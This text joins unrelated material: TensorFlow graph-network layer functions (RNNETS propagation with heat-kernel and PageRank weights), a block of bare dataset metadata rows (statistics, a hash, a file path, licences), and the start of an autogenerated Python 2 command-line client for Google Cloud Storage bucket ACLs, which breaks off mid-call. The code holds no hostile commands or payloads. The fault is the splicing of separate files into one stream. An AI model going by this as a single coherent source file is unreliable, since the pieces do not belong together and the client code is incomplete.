    """RN-Nets layer: multi-hop propagation with fixed heat-kernel weights.

    Same propagation front end as RNNETS_MLP (width-1 conv projection, then
    `hops` = 2 hops through `norm_mat`), but the hop representations are
    combined with fixed (non-trainable) weights
        w_i = t**i * exp(-t) / i!        (t = 5, i = 0 .. hops-1),
    i.e. Poisson/heat-kernel coefficients; i! is computed as
    exp(lgamma(i + 1)).

    Args:
        inputs: 2-D tensor of per-node features — presumably
            (num_nodes, in_dim). TODO confirm against caller.
        output_dim: per-node output feature dimension.
        norm_mat: SparseTensor used for propagation — presumably a
            normalized (num_nodes, num_nodes) adjacency; verify at call site.
        activation: callable applied to the biased result before returning.
        in_drop: input/feature dropout probability; 0.0 disables dropout.

    Returns:
        activation(...) of a tensor shaped (1, num_nodes, output_dim).
    """
    with tf.name_scope('my_attn'):
        if in_drop != 0.0:
            inputs = tf.nn.dropout(inputs, 1.0 - in_drop)
        # conv1d expects a batch dimension; add one, convolve, drop it again.
        inputs = tf.expand_dims(inputs, axis=0)
        seq_fts = tf.layers.conv1d(inputs, output_dim, 1, use_bias=False)
        if in_drop != 0.0:
            seq_fts = tf.nn.dropout(seq_fts, 1.0 - in_drop)
        hops = 2  # number of propagation steps through norm_mat
        seq_fts = tf.squeeze(seq_fts, axis=0)
        # n must be a static (graph-build-time) node count for the reshapes below.
        n, m = seq_fts.get_shape()
        n = int(n)
        # subspace[i] = norm_mat^(i+1) @ seq_fts — one entry per hop.
        H1 = tf.sparse_tensor_dense_matmul(norm_mat, seq_fts)
        subspace = list()
        subspace.append(H1)
        for i in range(hops-1):
            Hi = tf.sparse_tensor_dense_matmul(norm_mat, subspace[i])
            subspace.append(Hi)
        # Heat-kernel coefficients: t = 5, and t1 = -t so exp(t1) = exp(-t).
        t = 5
        t = tf.convert_to_tensor(t, dtype=tf.float32)
        t1 = -5
        t1 = tf.convert_to_tensor(t1, dtype=tf.float32)
        weights = list()
        for i in range(hops):
            i1 = tf.convert_to_tensor(i, dtype=tf.float32)
            i2 = tf.convert_to_tensor(i + 1, dtype=tf.float32)
            temp1 = tf.math.pow(t, i1)                 # t**i
            temp2 = tf.math.exp(tf.math.lgamma(i2))    # i! via exp(lgamma(i+1))
            temp3 = tf.math.divide(temp1, temp2)       # t**i / i!
            temp4 = tf.math.exp(t1)                    # exp(-t)
            weights.append(tf.math.multiply(temp3, temp4))
        W = tf.stack(weights, axis=0)
        W = tf.expand_dims(W, axis=0)
        # Aggregation: weighted sum over hops as a (1, hops) x (hops, n*d) matmul.
        H = tf.stack(subspace, axis=0)
        H = tf.reshape(H, [hops, n*output_dim])
        support = tf.matmul(W, H)
        vals = tf.reshape(support, [1, n, output_dim])
        # tf.contrib was removed in TF 2.x, so the bias is added manually
        # instead of via tf.contrib.layers.bias_add(vals).
        bias = tf.get_variable(shape=[output_dim,],initializer=tf.initializers.zeros,name="bias")
        ret = tf.nn.bias_add(vals,bias)
        return activation(ret)  # final nonlinearity supplied by the caller
def RNNETS_PR(inputs, output_dim, norm_mat, activation, in_drop=0.0):
    """RN-Nets layer: multi-hop propagation with fixed PageRank-style weights.

    Same propagation front end as RNNETS_MLP (width-1 conv projection, then
    `hops` = 2 hops through `norm_mat`), but the hop representations are
    combined with fixed (non-trainable) weights
        w_i = (1 - alpha) * alpha**i     (alpha = 0.8, i = 0 .. hops-1),
    the truncated personalized-PageRank series.

    Args:
        inputs: 2-D tensor of per-node features — presumably
            (num_nodes, in_dim). TODO confirm against caller.
        output_dim: per-node output feature dimension.
        norm_mat: SparseTensor used for propagation — presumably a
            normalized (num_nodes, num_nodes) adjacency; verify at call site.
        activation: callable applied to the biased result before returning.
        in_drop: input/feature dropout probability; 0.0 disables dropout.

    Returns:
        activation(...) of a tensor shaped (1, num_nodes, output_dim).
    """
    with tf.name_scope('my_attn'):
        if in_drop != 0.0:
            inputs = tf.nn.dropout(inputs, 1.0 - in_drop)
        # conv1d expects a batch dimension; add one, convolve, drop it again.
        inputs = tf.expand_dims(inputs, axis=0)
        seq_fts = tf.layers.conv1d(inputs, output_dim, 1, use_bias=False)
        if in_drop != 0.0:
            seq_fts = tf.nn.dropout(seq_fts, 1.0 - in_drop)
        hops = 2  # number of propagation steps through norm_mat
        seq_fts = tf.squeeze(seq_fts, axis=0)
        # n must be a static (graph-build-time) node count for the reshapes below.
        n, m = seq_fts.get_shape()
        n = int(n)
        # subspace[i] = norm_mat^(i+1) @ seq_fts — one entry per hop.
        H1 = tf.sparse_tensor_dense_matmul(norm_mat, seq_fts)
        subspace = list()
        subspace.append(H1)
        for i in range(hops-1):
            Hi = tf.sparse_tensor_dense_matmul(norm_mat, subspace[i])
            subspace.append(Hi)
        # PageRank-style coefficients: teleport alpha = 0.8, beta = 1 - alpha.
        alpha = 0.8
        beta = 1 - alpha
        alpha = tf.convert_to_tensor(alpha, dtype=tf.float32)
        beta = tf.convert_to_tensor(beta, dtype=tf.float32)
        weights = list()
        for i in range(hops):
            i1 = tf.convert_to_tensor(i, dtype=tf.float32)
            temp1 = tf.math.pow(alpha, i1)                  # alpha**i
            weights.append(tf.math.multiply(beta, temp1))   # (1-alpha)*alpha**i
        W = tf.stack(weights, axis=0)
        W = tf.expand_dims(W, axis=0)
        # Aggregation: weighted sum over hops as a (1, hops) x (hops, n*d) matmul.
        H = tf.stack(subspace, axis=0)
        H = tf.reshape(H, [hops, n*output_dim])
        support = tf.matmul(W, H)
        vals = tf.reshape(support, [1, n, output_dim])
        # tf.contrib was removed in TF 2.x, so the bias is added manually
        # instead of via tf.contrib.layers.bias_add(vals).
        bias = tf.get_variable(shape=[output_dim,],initializer=tf.initializers.zeros,name="bias")
        ret = tf.nn.bias_add(vals,bias)
        return activation(ret)  # final nonlinearity supplied by the caller
def linear_layer(inputs, output_dim, activation, in_drop=0.0):
    """Plain linear projection: width-1 conv to `output_dim`, bias, activation.

    No graph propagation — this is the baseline layer: optional input
    dropout, a bias-free width-1 conv projection, optional feature dropout,
    then a trainable bias and the caller-supplied `activation`.

    Args:
        inputs: 3-D tensor of features — presumably (batch, nodes, in_dim),
            since it is fed to conv1d without an added batch axis. TODO confirm.
        output_dim: output feature dimension.
        activation: callable applied to the biased result before returning.
        in_drop: input/feature dropout probability; 0.0 disables dropout.

    Returns:
        activation(...) of a tensor with last dimension `output_dim`.
    """
    with tf.name_scope('my_attn'):
        if in_drop != 0.0:
            inputs = tf.nn.dropout(inputs, 1.0 - in_drop)
        seq_fts = tf.layers.conv1d(inputs, output_dim, 1, use_bias=False)
        if in_drop != 0.0:
            seq_fts = tf.nn.dropout(seq_fts, 1.0 - in_drop)
        vals = seq_fts
        # BUG FIX: tf.contrib was removed in TF 2.x, so under
        # tensorflow.compat.v1 the original tf.contrib.layers.bias_add(vals)
        # raises AttributeError. Add the bias the same way the RNNETS_*
        # functions in this file already do. A distinct variable name is used
        # so this does not collide with their "bias"/"bias0" variables.
        bias = tf.get_variable(shape=[output_dim,],
                               initializer=tf.initializers.zeros,
                               name="bias_linear")
        ret = tf.nn.bias_add(vals, bias)
        return activation(ret)  # final nonlinearity supplied by the caller
| 33.5311
| 98
| 0.588756
| 1,049
| 7,008
| 3.755005
| 0.119161
| 0.048743
| 0.026657
| 0.030465
| 0.81772
| 0.791318
| 0.791318
| 0.773293
| 0.773293
| 0.773293
| 0
| 0.03125
| 0.283105
| 7,008
| 208
| 99
| 33.692308
| 0.752787
| 0.038385
| 0
| 0.735099
| 0
| 0
| 0.008328
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033113
| false
| 0
| 0.019868
| 0
| 0.086093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7cff48a0a7c98ecf998515d21d619fc69fe111d
| 143,275
|
py
|
Python
|
third_party/gsutil/third_party/apitools/samples/storage_sample/storage_v1/storage_v1.py
|
tingshao/catapult
|
a8fe19e0c492472a8ed5710be9077e24cc517c5c
|
[
"BSD-3-Clause"
] | 2,151
|
2020-04-18T07:31:17.000Z
|
2022-03-31T08:39:18.000Z
|
third_party/gsutil/third_party/apitools/samples/storage_sample/storage_v1/storage_v1.py
|
tingshao/catapult
|
a8fe19e0c492472a8ed5710be9077e24cc517c5c
|
[
"BSD-3-Clause"
] | 395
|
2020-04-18T08:22:18.000Z
|
2021-12-08T13:04:49.000Z
|
third_party/gsutil/third_party/apitools/samples/storage_sample/storage_v1/storage_v1.py
|
tingshao/catapult
|
a8fe19e0c492472a8ed5710be9077e24cc517c5c
|
[
"BSD-3-Clause"
] | 338
|
2020-04-18T08:03:10.000Z
|
2022-03-29T12:33:22.000Z
|
#!/usr/bin/env python
"""CLI for storage, version v1."""
# NOTE: This file is autogenerated and should not be edited by hand.
import code
import os
import platform
import sys
from apitools.base.protorpclite import message_types
from apitools.base.protorpclite import messages
from google.apputils import appcommands
import gflags as flags
import apitools.base.py as apitools_base
from apitools.base.py import cli as apitools_base_cli
import storage_v1_client as client_lib
import storage_v1_messages as messages
def _DeclareStorageFlags():
    """Declare global flags in an idempotent way."""
    # Guard: if one of our flags is already registered, a previous call has
    # already declared everything, so bail out to avoid duplicate-flag errors.
    if 'api_endpoint' in flags.FLAGS:
        return
    # CLI configuration flags.
    flags.DEFINE_string(
        'api_endpoint',
        u'https://www.googleapis.com/storage/v1/',
        'URL of the API endpoint to use.',
        short_name='storage_url')
    flags.DEFINE_string(
        'history_file',
        u'~/.storage.v1.history',
        'File with interactive shell history.')
    flags.DEFINE_multistring(
        'add_header', [],
        'Additional http headers (as key=value strings). '
        'Can be specified multiple times.')
    flags.DEFINE_string(
        'service_account_json_keyfile', '',
        'Filename for a JSON service account key downloaded'
        ' from the Developer Console.')
    # Standard API query-parameter flags (consumed by
    # GetGlobalParamsFromFlags).
    flags.DEFINE_enum(
        'alt',
        u'json',
        [u'json'],
        u'Data format for the response.')
    flags.DEFINE_string(
        'fields',
        None,
        u'Selector specifying which fields to include in a partial response.')
    flags.DEFINE_string(
        'key',
        None,
        u'API key. Your API key identifies your project and provides you with '
        u'API access, quota, and reports. Required unless you provide an OAuth '
        u'2.0 token.')
    flags.DEFINE_string(
        'oauth_token',
        None,
        u'OAuth 2.0 token for the current user.')
    flags.DEFINE_boolean(
        'prettyPrint',
        'True',
        u'Returns response with indentations and line breaks.')
    flags.DEFINE_string(
        'quotaUser',
        None,
        u'Available to use for quota purposes for server-side applications. Can'
        u' be any arbitrary string assigned to a user, but should not exceed 40'
        u' characters. Overrides userIp if both are provided.')
    flags.DEFINE_string(
        'trace',
        None,
        'A tracing token of the form "token:<tokenid>" to include in api '
        'requests.')
    flags.DEFINE_string(
        'userIp',
        None,
        u'IP address of the site where the request originates. Use this if you '
        u'want to enforce per-user limits.')
# Module-level flag setup: register the shared apitools base flags and the
# storage-specific flags declared above (idempotently).
FLAGS = flags.FLAGS
apitools_base_cli.DeclareBaseFlags()
_DeclareStorageFlags()
def GetGlobalParamsFromFlags():
    """Return a StandardQueryParameters based on flags."""
    result = messages.StandardQueryParameters()
    # 'alt' is enum-valued and needs an explicit conversion to the message's
    # enum type.
    if FLAGS['alt'].present:
        result.alt = messages.StandardQueryParameters.AltValueValuesEnum(FLAGS.alt)
    # The plain string parameters all share identical handling: copy the
    # flag's value (decoded from utf8) whenever it was set on the command
    # line.
    for flag_name in ('fields', 'key', 'oauth_token', 'quotaUser', 'trace',
                      'userIp'):
        if FLAGS[flag_name].present:
            setattr(result, flag_name,
                    getattr(FLAGS, flag_name).decode('utf8'))
    # Boolean parameter: assigned verbatim, no decoding.
    if FLAGS['prettyPrint'].present:
        result.prettyPrint = FLAGS.prettyPrint
    return result
def GetClientFromFlags():
    """Return a client object, configured from flags."""
    # Request/response logging can be enabled individually or through the
    # combined --log_request_response flag.
    log_request = FLAGS.log_request or FLAGS.log_request_response
    log_response = FLAGS.log_response or FLAGS.log_request_response
    api_endpoint = apitools_base.NormalizeApiEndpoint(FLAGS.api_endpoint)
    # Each --add_header value is a 'key=value' string; split on the first '='
    # only so header values may themselves contain '='.
    additional_http_headers = dict(x.split('=', 1) for x in FLAGS.add_header)
    credentials_args = {
        'service_account_json_keyfile': os.path.expanduser(FLAGS.service_account_json_keyfile)
    }
    try:
        client = client_lib.StorageV1(
            api_endpoint, log_request=log_request,
            log_response=log_response,
            credentials_args=credentials_args,
            additional_http_headers=additional_http_headers)
    except apitools_base.CredentialsError as e:
        # Credential failures are fatal for a CLI: report and exit non-zero.
        print 'Error creating credentials: %s' % e
        sys.exit(1)
    return client
class PyShell(appcommands.Cmd):
    # Interactive REPL command: drops the user into a Python console with a
    # configured client and the generated messages module pre-bound.

    def Run(self, _):
        """Run an interactive python shell with the client."""
        client = GetClientFromFlags()
        params = GetGlobalParamsFromFlags()
        # Promote any explicitly-set global query parameters onto the client
        # so they apply to every request issued from the shell.
        for field in params.all_fields():
            value = params.get_assigned_value(field.name)
            if value != field.default:
                client.AddGlobalParam(field.name, value)
        banner = """
== storage interactive console ==
client: a storage client
apitools_base: base apitools module
messages: the generated messages module
"""
        local_vars = {
            'apitools_base': apitools_base,
            'client': client,
            'client_lib': client_lib,
            'messages': messages,
        }
        # On Linux, use the readline-enabled console with persistent history;
        # elsewhere fall back to the plain stdlib InteractiveConsole.
        if platform.system() == 'Linux':
            console = apitools_base_cli.ConsoleWithReadline(
                local_vars, histfile=FLAGS.history_file)
        else:
            console = code.InteractiveConsole(local_vars)
        try:
            console.interact(banner)
        except SystemExit as e:
            return e.code
class BucketAccessControlsDelete(apitools_base_cli.NewCmd):
    """Command wrapping bucketAccessControls.Delete."""

    usage = """bucketAccessControls_delete <bucket> <entity>"""

    def __init__(self, name, fv):
        super(BucketAccessControlsDelete, self).__init__(name, fv)

    def RunWithArgs(self, bucket, entity):
        """Permanently deletes the ACL entry for the specified entity on the
        specified bucket.

        Args:
          bucket: Name of a bucket.
          entity: The entity holding the permission. Can be user-userId, user-
            emailAddress, group-groupId, group-emailAddress, allUsers, or
            allAuthenticatedUsers.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        # Positional CLI args are decoded from utf8 byte strings (Python 2)
        # before being placed in the request message.
        request = messages.StorageBucketAccessControlsDeleteRequest(
            bucket=bucket.decode('utf8'),
            entity=entity.decode('utf8'),
        )
        result = client.bucketAccessControls.Delete(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketAccessControlsGet(apitools_base_cli.NewCmd):
    """Command wrapping bucketAccessControls.Get."""

    usage = """bucketAccessControls_get <bucket> <entity>"""

    def __init__(self, name, fv):
        super(BucketAccessControlsGet, self).__init__(name, fv)

    def RunWithArgs(self, bucket, entity):
        """Returns the ACL entry for the specified entity on the specified bucket.

        Args:
          bucket: Name of a bucket.
          entity: The entity holding the permission. Can be user-userId, user-
            emailAddress, group-groupId, group-emailAddress, allUsers, or
            allAuthenticatedUsers.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        # Positional CLI args are decoded from utf8 byte strings (Python 2).
        request = messages.StorageBucketAccessControlsGetRequest(
            bucket=bucket.decode('utf8'),
            entity=entity.decode('utf8'),
        )
        result = client.bucketAccessControls.Get(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketAccessControlsInsert(apitools_base_cli.NewCmd):
    """Command wrapping bucketAccessControls.Insert."""

    usage = """bucketAccessControls_insert <bucket>"""

    def __init__(self, name, fv):
        super(BucketAccessControlsInsert, self).__init__(name, fv)
        # Per-command flags mirror the writable BucketAccessControl fields;
        # all are optional and only applied when set (see RunWithArgs).
        flags.DEFINE_string(
            'domain',
            None,
            u'The domain associated with the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'email',
            None,
            u'The email address associated with the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'entity',
            None,
            u'The entity holding the permission, in one of the following forms: '
            u'- user-userId - user-email - group-groupId - group-email - '
            u'domain-domain - project-team-projectId - allUsers - '
            u'allAuthenticatedUsers Examples: - The user liz@example.com would '
            u'be user-liz@example.com. - The group example@googlegroups.com '
            u'would be group-example@googlegroups.com. - To refer to all members'
            u' of the Google Apps for Business domain example.com, the entity '
            u'would be domain-example.com.',
            flag_values=fv)
        flags.DEFINE_string(
            'entityId',
            None,
            u'The ID for the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'etag',
            None,
            u'HTTP 1.1 Entity tag for the access-control entry.',
            flag_values=fv)
        flags.DEFINE_string(
            'id',
            None,
            u'The ID of the access-control entry.',
            flag_values=fv)
        flags.DEFINE_string(
            'kind',
            u'storage#bucketAccessControl',
            u'The kind of item this is. For bucket access control entries, this '
            u'is always storage#bucketAccessControl.',
            flag_values=fv)
        flags.DEFINE_string(
            'projectTeam',
            None,
            u'The project team associated with the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'role',
            None,
            u'The access permission for the entity. Can be READER, WRITER, or '
            u'OWNER.',
            flag_values=fv)
        flags.DEFINE_string(
            'selfLink',
            None,
            u'The link to this access-control entry.',
            flag_values=fv)

    def RunWithArgs(self, bucket):
        """Creates a new ACL entry on the specified bucket.

        Args:
          bucket: The name of the bucket.

        Flags:
          domain: The domain associated with the entity, if any.
          email: The email address associated with the entity, if any.
          entity: The entity holding the permission, in one of the following
            forms: - user-userId - user-email - group-groupId - group-email -
            domain-domain - project-team-projectId - allUsers -
            allAuthenticatedUsers Examples: - The user liz@example.com would be
            user-liz@example.com. - The group example@googlegroups.com would be
            group-example@googlegroups.com. - To refer to all members of the
            Google Apps for Business domain example.com, the entity would be
            domain-example.com.
          entityId: The ID for the entity, if any.
          etag: HTTP 1.1 Entity tag for the access-control entry.
          id: The ID of the access-control entry.
          kind: The kind of item this is. For bucket access control entries, this
            is always storage#bucketAccessControl.
          projectTeam: The project team associated with the entity, if any.
          role: The access permission for the entity. Can be READER, WRITER, or
            OWNER.
          selfLink: The link to this access-control entry.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        request = messages.BucketAccessControl(
            bucket=bucket.decode('utf8'),
        )
        # Copy only flags that were explicitly provided on the command line
        # into the request message.
        if FLAGS['domain'].present:
            request.domain = FLAGS.domain.decode('utf8')
        if FLAGS['email'].present:
            request.email = FLAGS.email.decode('utf8')
        if FLAGS['entity'].present:
            request.entity = FLAGS.entity.decode('utf8')
        if FLAGS['entityId'].present:
            request.entityId = FLAGS.entityId.decode('utf8')
        if FLAGS['etag'].present:
            request.etag = FLAGS.etag.decode('utf8')
        if FLAGS['id'].present:
            request.id = FLAGS.id.decode('utf8')
        if FLAGS['kind'].present:
            request.kind = FLAGS.kind.decode('utf8')
        # projectTeam is a nested message, parsed from its JSON string form.
        if FLAGS['projectTeam'].present:
            request.projectTeam = apitools_base.JsonToMessage(messages.BucketAccessControl.ProjectTeamValue, FLAGS.projectTeam)
        if FLAGS['role'].present:
            request.role = FLAGS.role.decode('utf8')
        if FLAGS['selfLink'].present:
            request.selfLink = FLAGS.selfLink.decode('utf8')
        result = client.bucketAccessControls.Insert(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketAccessControlsList(apitools_base_cli.NewCmd):
"""Command wrapping bucketAccessControls.List."""
usage = """bucketAccessControls_list <bucket>"""
def __init__(self, name, fv):
super(BucketAccessControlsList, self).__init__(name, fv)
def RunWithArgs(self, bucket):
"""Retrieves ACL entries on the specified bucket.
Args:
bucket: Name of a bucket.
"""
client = GetClientFromFlags()
global_params = GetGlobalParamsFromFlags()
request = messages.StorageBucketAccessControlsListRequest(
bucket=bucket.decode('utf8'),
)
result = client.bucketAccessControls.List(
request, global_params=global_params)
print apitools_base_cli.FormatOutput(result)
class BucketAccessControlsPatch(apitools_base_cli.NewCmd):
    """Command wrapping bucketAccessControls.Patch."""

    usage = """bucketAccessControls_patch <bucket> <entity>"""

    def __init__(self, name, fv):
        super(BucketAccessControlsPatch, self).__init__(name, fv)
        # Per-command flags mirror the writable BucketAccessControl fields;
        # 'entity' is a positional argument here, not a flag.
        flags.DEFINE_string(
            'domain',
            None,
            u'The domain associated with the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'email',
            None,
            u'The email address associated with the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'entityId',
            None,
            u'The ID for the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'etag',
            None,
            u'HTTP 1.1 Entity tag for the access-control entry.',
            flag_values=fv)
        flags.DEFINE_string(
            'id',
            None,
            u'The ID of the access-control entry.',
            flag_values=fv)
        flags.DEFINE_string(
            'kind',
            u'storage#bucketAccessControl',
            u'The kind of item this is. For bucket access control entries, this '
            u'is always storage#bucketAccessControl.',
            flag_values=fv)
        flags.DEFINE_string(
            'projectTeam',
            None,
            u'The project team associated with the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'role',
            None,
            u'The access permission for the entity. Can be READER, WRITER, or '
            u'OWNER.',
            flag_values=fv)
        flags.DEFINE_string(
            'selfLink',
            None,
            u'The link to this access-control entry.',
            flag_values=fv)

    def RunWithArgs(self, bucket, entity):
        """Updates an ACL entry on the specified bucket. This method supports
        patch semantics.

        Args:
          bucket: The name of the bucket.
          entity: The entity holding the permission, in one of the following
            forms: - user-userId - user-email - group-groupId - group-email -
            domain-domain - project-team-projectId - allUsers -
            allAuthenticatedUsers Examples: - The user liz@example.com would be
            user-liz@example.com. - The group example@googlegroups.com would be
            group-example@googlegroups.com. - To refer to all members of the
            Google Apps for Business domain example.com, the entity would be
            domain-example.com.

        Flags:
          domain: The domain associated with the entity, if any.
          email: The email address associated with the entity, if any.
          entityId: The ID for the entity, if any.
          etag: HTTP 1.1 Entity tag for the access-control entry.
          id: The ID of the access-control entry.
          kind: The kind of item this is. For bucket access control entries, this
            is always storage#bucketAccessControl.
          projectTeam: The project team associated with the entity, if any.
          role: The access permission for the entity. Can be READER, WRITER, or
            OWNER.
          selfLink: The link to this access-control entry.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        request = messages.BucketAccessControl(
            bucket=bucket.decode('utf8'),
            entity=entity.decode('utf8'),
        )
        # Copy only flags explicitly provided on the command line into the
        # request message (patch semantics: unset fields stay untouched).
        if FLAGS['domain'].present:
            request.domain = FLAGS.domain.decode('utf8')
        if FLAGS['email'].present:
            request.email = FLAGS.email.decode('utf8')
        if FLAGS['entityId'].present:
            request.entityId = FLAGS.entityId.decode('utf8')
        if FLAGS['etag'].present:
            request.etag = FLAGS.etag.decode('utf8')
        if FLAGS['id'].present:
            request.id = FLAGS.id.decode('utf8')
        if FLAGS['kind'].present:
            request.kind = FLAGS.kind.decode('utf8')
        # projectTeam is a nested message, parsed from its JSON string form.
        if FLAGS['projectTeam'].present:
            request.projectTeam = apitools_base.JsonToMessage(messages.BucketAccessControl.ProjectTeamValue, FLAGS.projectTeam)
        if FLAGS['role'].present:
            request.role = FLAGS.role.decode('utf8')
        if FLAGS['selfLink'].present:
            request.selfLink = FLAGS.selfLink.decode('utf8')
        result = client.bucketAccessControls.Patch(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketAccessControlsUpdate(apitools_base_cli.NewCmd):
    """Command wrapping bucketAccessControls.Update."""

    usage = """bucketAccessControls_update <bucket> <entity>"""

    def __init__(self, name, fv):
        super(BucketAccessControlsUpdate, self).__init__(name, fv)
        # Per-command flags mirror the writable BucketAccessControl fields;
        # 'entity' is a positional argument here, not a flag.
        flags.DEFINE_string(
            'domain',
            None,
            u'The domain associated with the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'email',
            None,
            u'The email address associated with the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'entityId',
            None,
            u'The ID for the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'etag',
            None,
            u'HTTP 1.1 Entity tag for the access-control entry.',
            flag_values=fv)
        flags.DEFINE_string(
            'id',
            None,
            u'The ID of the access-control entry.',
            flag_values=fv)
        flags.DEFINE_string(
            'kind',
            u'storage#bucketAccessControl',
            u'The kind of item this is. For bucket access control entries, this '
            u'is always storage#bucketAccessControl.',
            flag_values=fv)
        flags.DEFINE_string(
            'projectTeam',
            None,
            u'The project team associated with the entity, if any.',
            flag_values=fv)
        flags.DEFINE_string(
            'role',
            None,
            u'The access permission for the entity. Can be READER, WRITER, or '
            u'OWNER.',
            flag_values=fv)
        flags.DEFINE_string(
            'selfLink',
            None,
            u'The link to this access-control entry.',
            flag_values=fv)

    def RunWithArgs(self, bucket, entity):
        """Updates an ACL entry on the specified bucket.

        Args:
          bucket: The name of the bucket.
          entity: The entity holding the permission, in one of the following
            forms: - user-userId - user-email - group-groupId - group-email -
            domain-domain - project-team-projectId - allUsers -
            allAuthenticatedUsers Examples: - The user liz@example.com would be
            user-liz@example.com. - The group example@googlegroups.com would be
            group-example@googlegroups.com. - To refer to all members of the
            Google Apps for Business domain example.com, the entity would be
            domain-example.com.

        Flags:
          domain: The domain associated with the entity, if any.
          email: The email address associated with the entity, if any.
          entityId: The ID for the entity, if any.
          etag: HTTP 1.1 Entity tag for the access-control entry.
          id: The ID of the access-control entry.
          kind: The kind of item this is. For bucket access control entries, this
            is always storage#bucketAccessControl.
          projectTeam: The project team associated with the entity, if any.
          role: The access permission for the entity. Can be READER, WRITER, or
            OWNER.
          selfLink: The link to this access-control entry.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        request = messages.BucketAccessControl(
            bucket=bucket.decode('utf8'),
            entity=entity.decode('utf8'),
        )
        # Copy only flags explicitly provided on the command line into the
        # request message.
        if FLAGS['domain'].present:
            request.domain = FLAGS.domain.decode('utf8')
        if FLAGS['email'].present:
            request.email = FLAGS.email.decode('utf8')
        if FLAGS['entityId'].present:
            request.entityId = FLAGS.entityId.decode('utf8')
        if FLAGS['etag'].present:
            request.etag = FLAGS.etag.decode('utf8')
        if FLAGS['id'].present:
            request.id = FLAGS.id.decode('utf8')
        if FLAGS['kind'].present:
            request.kind = FLAGS.kind.decode('utf8')
        # projectTeam is a nested message, parsed from its JSON string form.
        if FLAGS['projectTeam'].present:
            request.projectTeam = apitools_base.JsonToMessage(messages.BucketAccessControl.ProjectTeamValue, FLAGS.projectTeam)
        if FLAGS['role'].present:
            request.role = FLAGS.role.decode('utf8')
        if FLAGS['selfLink'].present:
            request.selfLink = FLAGS.selfLink.decode('utf8')
        result = client.bucketAccessControls.Update(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketsDelete(apitools_base_cli.NewCmd):
    """Command wrapping buckets.Delete."""

    usage = """buckets_delete <bucket>"""

    def __init__(self, name, fv):
        super(BucketsDelete, self).__init__(name, fv)
        flags.DEFINE_string(
            'ifMetagenerationMatch',
            None,
            u'If set, only deletes the bucket if its metageneration matches this '
            u'value.',
            flag_values=fv)
        flags.DEFINE_string(
            'ifMetagenerationNotMatch',
            None,
            u'If set, only deletes the bucket if its metageneration does not '
            u'match this value.',
            flag_values=fv)

    def RunWithArgs(self, bucket):
        """Permanently deletes an empty bucket.

        Args:
          bucket: Name of a bucket.

        Flags:
          ifMetagenerationMatch: If set, only deletes the bucket if its
            metageneration matches this value.
          ifMetagenerationNotMatch: If set, only deletes the bucket if its
            metageneration does not match this value.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        request = messages.StorageBucketsDeleteRequest(
            bucket=bucket.decode('utf8'),
        )
        # Metageneration preconditions are declared as string flags but the
        # request fields are numeric, hence the int() conversions.
        if FLAGS['ifMetagenerationMatch'].present:
            request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
        if FLAGS['ifMetagenerationNotMatch'].present:
            request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
        result = client.buckets.Delete(
            request, global_params=global_params)
        print apitools_base_cli.FormatOutput(result)
class BucketsGet(apitools_base_cli.NewCmd):
    """Command wrapping buckets.Get."""

    usage = """buckets_get <bucket>"""

    def __init__(self, name, fv):
        super(BucketsGet, self).__init__(name, fv)
        flags.DEFINE_string(
            'ifMetagenerationMatch',
            None,
            u'Makes the return of the bucket metadata conditional on whether the '
            u"bucket's current metageneration matches the given value.",
            flag_values=fv)
        flags.DEFINE_string(
            'ifMetagenerationNotMatch',
            None,
            u'Makes the return of the bucket metadata conditional on whether the '
            u"bucket's current metageneration does not match the given value.",
            flag_values=fv)
        flags.DEFINE_enum(
            'projection',
            u'full',
            [u'full', u'noAcl'],
            u'Set of properties to return. Defaults to noAcl.',
            flag_values=fv)

    def RunWithArgs(self, bucket):
        """Returns metadata for the specified bucket.

        Args:
          bucket: Name of a bucket.

        Flags:
          ifMetagenerationMatch: Makes the return of the bucket metadata
            conditional on whether the bucket's current metageneration matches the
            given value.
          ifMetagenerationNotMatch: Makes the return of the bucket metadata
            conditional on whether the bucket's current metageneration does not
            match the given value.
          projection: Set of properties to return. Defaults to noAcl.
        """
        client = GetClientFromFlags()
        global_params = GetGlobalParamsFromFlags()
        request = messages.StorageBucketsGetRequest(
            bucket=bucket.decode('utf8'),
        )
        # String flags are converted to the numeric / enum types the request
        # message expects; only explicitly-set flags are copied.
        if FLAGS['ifMetagenerationMatch'].present:
            request.ifMetagenerationMatch = int(FLAGS.ifMetagenerationMatch)
        if FLAGS['ifMetagenerationNotMatch'].present:
            request.ifMetagenerationNotMatch = int(FLAGS.ifMetagenerationNotMatch)
        if FLAGS['projection'].present:
            request.projection = messages.StorageBucketsGetRequest.ProjectionValueValuesEnum(FLAGS.projection)
        result = client.buckets.Get(
